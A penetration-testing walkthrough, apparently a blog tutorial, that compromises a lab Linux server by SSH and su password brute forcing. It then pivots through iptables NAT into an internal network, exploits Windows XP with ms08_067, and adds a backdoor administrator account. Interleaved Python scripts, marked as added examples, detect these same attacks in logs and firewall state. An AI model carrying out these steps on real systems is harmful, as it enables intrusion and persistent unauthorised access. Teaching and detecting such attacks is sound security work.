Pentest Linux


Author: Sumedt Jitpukdebodin
Organization: ACIS i-Secure
Email ID: materaj@gmail.com
Blog: http://r00tsec.blogspot.com

Penetration Testing Linux with Brute Force Tool


Sometimes my job is to penetration test (pentest) Linux servers and, mostly, to harden them. But administrators often use a simple (easy) password for the root account or their own account, and that is the weak point or vulnerability that lets me get into the internal network and own the system. The first penetration testing tool I think of is the Metasploit Framework, the world's largest Ruby project; it has many, many useful modules, not only exploitation modules. You can do sniffing, DoS (Denial Of Service), crawling and brute forcing with this tool. The Metasploit Framework is the famous tool in the security world because it's free, up-to-date and has many developers creating new modules all the time. That is why I like this tool, and when I have a pentest job, it is the first thing that comes to my mind. In the last couple of days, I got a new tool to help me get the password of the root account. Its name is Sucrack. Sucrack is a multithreaded Linux/UNIX tool for cracking local user accounts via wordlist brute forcing of su. After I tried it, I liked it because it's easy to use in any environment and fast, and that's it: you can get the password of the root account with this tool. Now we're ready to own the system.

My tools are:
- Backtrack 5 GNOME 64 Bit Version
- Metasploit Framework Version 3.8.0-dev r13080
- Sucrack Version 1.2.3
- Nmap Version 5.51

SCENARIO:
[Attacker Machine]
OS: Backtrack 5 GNOME 64bit Version.
Metasploit Version: 3.8.0-dev r13091
Sucrack Version: 1.2.3
IP Address: 192.168.168.156

[First Victim]
OS: Ubuntu 10.10
IP Address: 192.168.168.129
Internal IP Address: 192.168.59.142

[Second Victim (Internal Network)]
OS: Windows XP SP2
Internal IP Address: 192.168.59.143

Objective: We don't have any information about the network or any deep information about the first and second victim. We have only the IP Addresses of the first and second victims. But our goal is to get a shell on the second victim. My target is the second victim, which is in the internal network. So the first thing we must do is own the first victim and turn it into my gateway for connecting to the internal network. And finally, own the second victim.

Detail Of Steps:
Step 1: The first thing we must do is perform the scanning of the first victim with Nmap. The nmap options that we use are "nmap -vv -sV -O": verbose output into the console, probe the service info and detect the OS.

The results show me that the http and ssh services are open. Now we will use Metasploit to get in there.

Step 2: Go to your Metasploit Console with terminal -> msfconsole or Applications Menu -> Backtrack -> Exploitation Tools -> Network Exploitation Tools -> Metasploit Framework -> msfconsole

Step 3: In the first step, we found that the ssh server is open, so now we will use the ssh_login module, auxiliary/scanner/ssh/ssh_login, for brute forcing the ssh server (you can search for the modules created for "ssh" with the "search ssh" command).

You can see the details of this module with the "info" command.

So we see that the parameters required by this module are:

"BRUTEFORCE_SPEED" - Speed of brute forcing.
"RHOSTS" - Target hostname or IP Address.
"RPORT" - Target port used for SSH (the SSH port).
"STOP_ON_SUCCESS" - Stop brute forcing after getting the credential.
"THREADS" - Number of concurrent threads.
"VERBOSE" - Print output to your console.

Some parameters are set automatically, some parameters you must set by yourself.

Step 4: Now we set "RHOSTS", "USER_FILE" and "PASS_FILE" before starting the brute forcing.

"USER_FILE" - Wordlist that contains usernames, one per line.
"PASS_FILE" - Wordlist that contains passwords, one per line.

Example of USER_FILE (picture)

Example of PASS_FILE (picture)

Step 5: Now we're ready to brute force, but we will check the options again before starting the attack, with the "show options" command.

After checking the parameters, I think we're ready to go. Start the attack with the "run" or "exploit" command.

Go take a nap or play a game while Metasploit is guessing. Sometimes it may take a long time and sometimes a short time, depending on the strength of the password and your wordlist.

Step 6: When it gets the correct password, we will see a result like this picture.

This picture shows you that username "john" uses password "p@ssw0rd", and now we get a connection session to it automatically. The session ID of the connection session is 1. We can use PuTTY or another ssh client to connect to the host, or use Metasploit to get in there. This tutorial uses Metasploit to get it.

Step 7: Now we can get in there with the "sessions -i 1" command.

We can check whether we're already in or not with Linux commands, e.g. the "ls" and "pwd" commands.

But we can't use the "su" command. It will show you the message 'must be run from a terminal'.

Step 8: We can get a TTY (terminal) in two ways.

First, if the Expect language is installed in the system, create getsh.exp with:

#!/usr/bin/expect
spawn sh
interact

Execute getsh.exp with the "expect getsh.exp" command, and Walla!! You get a TTY and can use the "su" command.

Second, if the Python language is installed in the system, use this command to get the shell with a TTY: "python -c 'import pty; pty.spawn("/bin/sh")'"

So we're lucky, this system has the Python language installed. And I use the second way to get the shell.

Step 9: After the last step, we got the shell and want to get "root" privilege. So we try to use the "sudo -s" command, but the john account is not in the sudoers file.

Now we will use sucrack for brute forcing in the local system. We can use the "wget" command with the download link (http://labs.portcullis.co.uk/download/sucrack-1.2.3.tar.gz) and compile it on the victim system (the victim system must have the gcc compiler), or use the "scp" command to take the file compiled on the attacker machine to the victim machine. I take the second way because in this situation the victim machine doesn't have the gcc compiler.

After getting the tar.gz, extract it with "tar xzvf sucrack-1.2.3.tar.gz".

Go to the folder and compile it with "./configure CFLAGS=-m32 && make" (set CFLAGS=-m32 to compile it to run on 32bit, because the attacker machine's architecture is 64bit but the victim machine's architecture is 32bit). After compiling completes, upload the folder to the victim system with "scp -r hacker@hackerip:/pentest/exploits/framework3/sucrack-1.2.3 ." (run this command on the victim system) and upload the wordlist for brute forcing too.

Step 10: On the victim machine, go to sucrack -> src and start brute forcing with the "./sucrack -w 100 -u root password.txt" command and wait for the result. If it fails it will show the message "bye, bye!", if it succeeds it will show like the picture below.

Now we have the root password ("P@SSWORD"), try to use the "su" command to login to the "root" account. And Walla!!! We own this machine completely.
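Both attacks so far, the remote ssh_login guessing in Steps 3 to 6 and the local su guessing with sucrack in Steps 9 and 10, leave a dense trail of failures in /var/log/auth.log on the victim. The following detection script is an added example written for this page, not the author's code and not part of Metasploit or sucrack: it parses syslog-style auth.log lines, groups sshd failures by source address and su failures by "user->target", and raises an alert when a burst of failures inside a sliding window is followed by a success. The log lines, the hostname "ubuntu" and the thresholds are constructed assumptions.

```python
"""Detect password-guessing bursts in syslog-style auth.log lines.

Added example for the two attacks described on this page: remote guessing
against sshd (the ssh_login module) and local guessing of root's password
through su (sucrack). The log lines are constructed samples, not real captures.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log on the first victim (hostname "ubuntu" is assumed).
SAMPLE_AUTH_LOG = """\
Jun 10 10:00:01 ubuntu sshd[2101]: Failed password for invalid user admin from 192.168.168.156 port 40122 ssh2
Jun 10 10:00:01 ubuntu sshd[2102]: Failed password for john from 192.168.168.156 port 40123 ssh2
Jun 10 10:00:02 ubuntu sshd[2103]: Failed password for john from 192.168.168.156 port 40124 ssh2
Jun 10 10:00:02 ubuntu sshd[2104]: Failed password for john from 192.168.168.156 port 40125 ssh2
Jun 10 10:00:03 ubuntu sshd[2105]: Failed password for john from 192.168.168.156 port 40126 ssh2
Jun 10 10:00:03 ubuntu sshd[2106]: Accepted password for john from 192.168.168.156 port 40127 ssh2
Jun 10 10:05:00 ubuntu su[2200]: pam_unix(su:auth): authentication failure; logname=john uid=1000 euid=0 tty=/dev/pts/1 ruser=john rhost=  user=root
Jun 10 10:05:00 ubuntu su[2200]: FAILED su for root by john
Jun 10 10:05:00 ubuntu su[2201]: FAILED su for root by john
Jun 10 10:05:01 ubuntu su[2202]: FAILED su for root by john
Jun 10 10:05:01 ubuntu su[2203]: FAILED su for root by john
Jun 10 10:05:01 ubuntu su[2204]: FAILED su for root by john
Jun 10 10:05:02 ubuntu su[2205]: Successful su for root by john
Jun 10 11:30:00 ubuntu sshd[2300]: Accepted publickey for alice from 10.0.0.5 port 50000 ssh2
"""

SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<proc>[\w-]+)\[\d+\]: (?P<msg>.*)$")
SSHD_FAIL = re.compile(r"^Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port")
SSHD_OK = re.compile(r"^Accepted \w+ for (?P<user>\S+) from (?P<src>\S+) port")
SU_FAIL = re.compile(r"^FAILED su for (?P<target>\S+) by (?P<user>\S+)")
SU_OK = re.compile(r"^Successful su for (?P<target>\S+) by (?P<user>\S+)")


def parse_events(text):
    """Turn raw auth.log text into (timestamp, kind, key, outcome) tuples.

    kind is "ssh" (key = source address) or "su" (key = "user->target");
    outcome is "fail" or "success". Lines that are neither are ignored.
    """
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; only relative order within one log matters here
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        proc, msg = m["proc"], m["msg"]
        if proc == "sshd":
            f, ok = SSHD_FAIL.match(msg), SSHD_OK.match(msg)
            if f:
                events.append((ts, "ssh", f["src"], "fail"))
            elif ok:
                events.append((ts, "ssh", ok["src"], "success"))
        elif proc == "su":
            f, ok = SU_FAIL.match(msg), SU_OK.match(msg)
            if f:
                events.append((ts, "su", f"{f['user']}->{f['target']}", "fail"))
            elif ok:
                events.append((ts, "su", f"{ok['user']}->{ok['target']}", "success"))
    return events


def find_bursts(events, threshold=4, window_seconds=60):
    """Flag keys with >= threshold failures inside a sliding window.

    Returns (kind, key, peak_failures, success_after_burst) tuples. A success
    that follows a burst is the case a defender most wants to see: it means
    the guessing worked, as it did for "john" on this page.
    """
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev[1], ev[2])].append(ev)
    alerts = []
    for (kind, key), evs in by_key.items():
        evs.sort(key=lambda e: e[0])
        recent, peak, succeeded = [], 0, False
        for ts, _, _, outcome in evs:
            recent = [t for t in recent if (ts - t).total_seconds() <= window_seconds]
            if outcome == "fail":
                recent.append(ts)
                peak = max(peak, len(recent))
            elif len(recent) >= threshold:
                succeeded = True
        if peak >= threshold:
            alerts.append((kind, key, peak, succeeded))
    return alerts


if __name__ == "__main__":
    for kind, key, peak, succeeded in find_bursts(parse_events(SAMPLE_AUTH_LOG)):
        print(f"{kind}: {key}: {peak} failures in window, success afterwards: {succeeded}")
```

On the sample both keys trip the rule with five failures each followed by a success. In practice the same two signals are what a lockout policy (pam_faillock for su, MaxAuthTries and key-only authentication for sshd) removes, so the script is most useful as a check that those controls are actually in force.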

Step 11: Try to get the IP Address of this host.

We found that this machine is like a door for the attacker to get through to the internal network. And we will use it like a bridge to connect to the internal network with iptables. We use "echo 1 > /proc/sys/net/ipv4/ip_forward" to enable IP forwarding. We use "iptables -P FORWARD ACCEPT" and "iptables --table nat -A POSTROUTING -o eth1 -j MASQUERADE" to create the bridge between the attacker and the internal network.

On the attacker machine, add a route for connecting to the internal network with "route add -net 192.168.59.0/24 gw 192.168.168.129".

Now we're connected to the internal network.
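The three changes in Step 11 (ip_forward set to 1, the FORWARD policy set to ACCEPT, and a MASQUERADE rule in the nat POSTROUTING chain) are exactly what a server that is not supposed to route traffic should never show. The audit below is an added example written for this page, not the author's code: it parses iptables-save output and the ip_forward sysctl value and reports each pivot indicator. The two iptables-save samples are constructed; audit_live_host reads the real values and needs root for iptables-save.

```python
"""Audit a Linux host for signs it has been turned into a pivot gateway.

Added example, not from the page's author. Inputs are the contents of
/proc/sys/net/ipv4/ip_forward and the output of `iptables-save`; the
samples below are constructed to match the state described in Step 11.
"""
import re
import subprocess

# Constructed iptables-save output resembling the first victim after Step 11.
PIVOTED_IPTABLES = """\
# Generated by iptables-save
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A POSTROUTING -o eth1 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
"""

# Constructed baseline for a server that should never route traffic.
HARDENED_IPTABLES = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp --dport 22 -j ACCEPT
COMMIT
"""

RULE_RE = re.compile(r"^-A (?P<chain>\S+)(?P<args>.*)$")
POLICY_RE = re.compile(r"^:(?P<chain>\S+) (?P<policy>\S+) ")


def parse_iptables_save(text):
    """Return (policies, rules): policies[(table, chain)] = policy string,
    rules = list of (table, chain, rule_args). Tables start at '*name' lines."""
    policies, rules, table = {}, [], None
    for line in text.splitlines():
        if line.startswith("*"):
            table = line[1:].strip()
        elif line.startswith(":") and table:
            m = POLICY_RE.match(line)
            if m:
                policies[(table, m["chain"])] = m["policy"]
        elif line.startswith("-A") and table:
            m = RULE_RE.match(line)
            if m:
                rules.append((table, m["chain"], m["args"].strip()))
    return policies, rules


def audit_gateway(ip_forward_value, iptables_save_text):
    """Return a list of human-readable findings; an empty list means no pivot indicators."""
    findings = []
    if ip_forward_value.strip() == "1":
        findings.append("net.ipv4.ip_forward is enabled")
    policies, rules = parse_iptables_save(iptables_save_text)
    # The kernel's built-in default policy is ACCEPT, so a missing filter table is flagged too.
    if policies.get(("filter", "FORWARD"), "ACCEPT") == "ACCEPT":
        findings.append("filter FORWARD chain policy is ACCEPT")
    for table, chain, args in rules:
        if table == "nat" and chain == "POSTROUTING" and "-j MASQUERADE" in args:
            findings.append(f"nat POSTROUTING masquerades traffic: {args}")
    return findings


def audit_live_host():
    """Run the audit against the local machine (iptables-save requires root)."""
    with open("/proc/sys/net/ipv4/ip_forward") as fh:
        ip_forward = fh.read()
    save = subprocess.run(["iptables-save"], capture_output=True, text=True, check=True).stdout
    return audit_gateway(ip_forward, save)


if __name__ == "__main__":
    print("pivoted host:", audit_gateway("1\n", PIVOTED_IPTABLES))
    print("hardened host:", audit_gateway("0\n", HARDENED_IPTABLES))
```

The hardened baseline produces no findings because ip_forward is 0, the FORWARD policy is DROP and there is no nat table at all; the pivoted state produces all three. Pinning net.ipv4.ip_forward=0 in sysctl.conf and a FORWARD DROP policy in the persisted ruleset makes the same check a cheap cron job.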

Step 12:

We already know the IP Address of the second victim is 192.168.59.143. Try to ping it.

The second victim is alive. Perform scanning with "nmap -v -sV".

We found the netbios service (Port 139/445) and the OS is Windows XP SP2 or SP3 in the results. So I will try to use the classic module of Metasploit to own it.

Step 13: Go to the Metasploit console and use the "exploit/windows/smb/ms08_067_netapi" module for remote code exploitation of the smb service (139/445).

You can get the information of this module with the "info" command and get the parameters that you must set with the "show options" command.

Set the RHOST parameter with the target address (192.168.59.143).

Step 14: Run it with the "exploit" command.

Now we got a shell on the second victim. You can use "sysinfo" to view information about this victim.

Step 15: Interact with the cmd shell with the "shell" command.

After we're in the cmd shell, add a new user to the administrators group to create a backdoor with "net user hacker /add" and "net localgroup administrators hacker /add".
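The two "net" commands in Step 15 leave a pair of Security-log events on the victim: a user-account-created event followed seconds later by a member-added-to-local-group event for the same account. The correlation below is an added example written for this page, not the author's code: it takes parsed event records and flags any account that was created and then placed in a privileged group within a short gap. Event IDs 624 and 636 are the Windows XP/2003 IDs for those two events; 4720 and 4732 are their Vista-and-later equivalents (the newer IDs are the old ones plus 4096). The event records are constructed dictionaries in the shape of a parsed log export.

```python
"""Correlate "account created" with "added to Administrators" in Security-log records.

Added example, not from the page's author. The records are constructed to look
like the second victim's log after Step 15; fields mirror a parsed export.
"""
from datetime import datetime, timedelta

USER_CREATED = {624, 4720}   # XP/2003 ID and Vista+ ID for "user account created"
MEMBER_ADDED = {636, 4732}   # XP/2003 ID and Vista+ ID for "member added to local group"

# Constructed security-log records (timestamp, event id, affected account, group, acting account).
SAMPLE_EVENTS = [
    {"time": "2011-06-10 11:40:00", "event_id": 624, "target": "hacker", "group": None, "subject": "Administrator"},
    {"time": "2011-06-10 11:40:02", "event_id": 636, "target": "hacker", "group": "Administrators", "subject": "Administrator"},
    {"time": "2011-06-10 09:00:00", "event_id": 624, "target": "svc_backup", "group": None, "subject": "itadmin"},
    {"time": "2011-06-11 15:00:00", "event_id": 636, "target": "svc_backup", "group": "Backup Operators", "subject": "itadmin"},
    {"time": "2011-06-10 12:00:00", "event_id": 4732, "target": "alice", "group": "Administrators", "subject": "itadmin"},
]


def _ts(record):
    return datetime.strptime(record["time"], "%Y-%m-%d %H:%M:%S")


def find_backdoor_admins(events, max_gap=timedelta(minutes=10), groups=("Administrators",)):
    """Return (account, created_at, added_at, group) for every account that was
    created and then placed in one of `groups` no more than max_gap later.

    Ordinary provisioning (create today, grant a role tomorrow) falls outside
    the gap; the create-then-elevate pattern of a backdoor account does not.
    """
    ordered = sorted(events, key=_ts)
    created = {}
    for ev in ordered:
        if ev["event_id"] in USER_CREATED:
            created[ev["target"]] = _ts(ev)
    hits = []
    for ev in ordered:
        if ev["event_id"] in MEMBER_ADDED and ev["group"] in groups and ev["target"] in created:
            gap = _ts(ev) - created[ev["target"]]
            if timedelta(0) <= gap <= max_gap:
                hits.append((ev["target"], created[ev["target"]], _ts(ev), ev["group"]))
    return hits


if __name__ == "__main__":
    for account, made, added, group in find_backdoor_admins(SAMPLE_EVENTS):
        print(f"{account}: created {made}, added to {group} {(added - made).total_seconds():.0f}s later")
```

On the sample only "hacker" is reported: "svc_backup" was elevated a day after creation and into a different group, and "alice" was never created in the window. Widening `groups` and `max_gap` turns the same function into a general review of recent privileged-group changes.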

Game Over, we're done with all the jobs in this project.

References:
1. Metasploit Framework: http://www.metasploit.com
2. Post Exploitation without TTY: http://pentestmonkey.net/blog/post-exploitation-without-a-tty/
3. Sucrack: http://labs.portcullis.co.uk/application/sucrack/
4. Nmap: http://nmap.org/
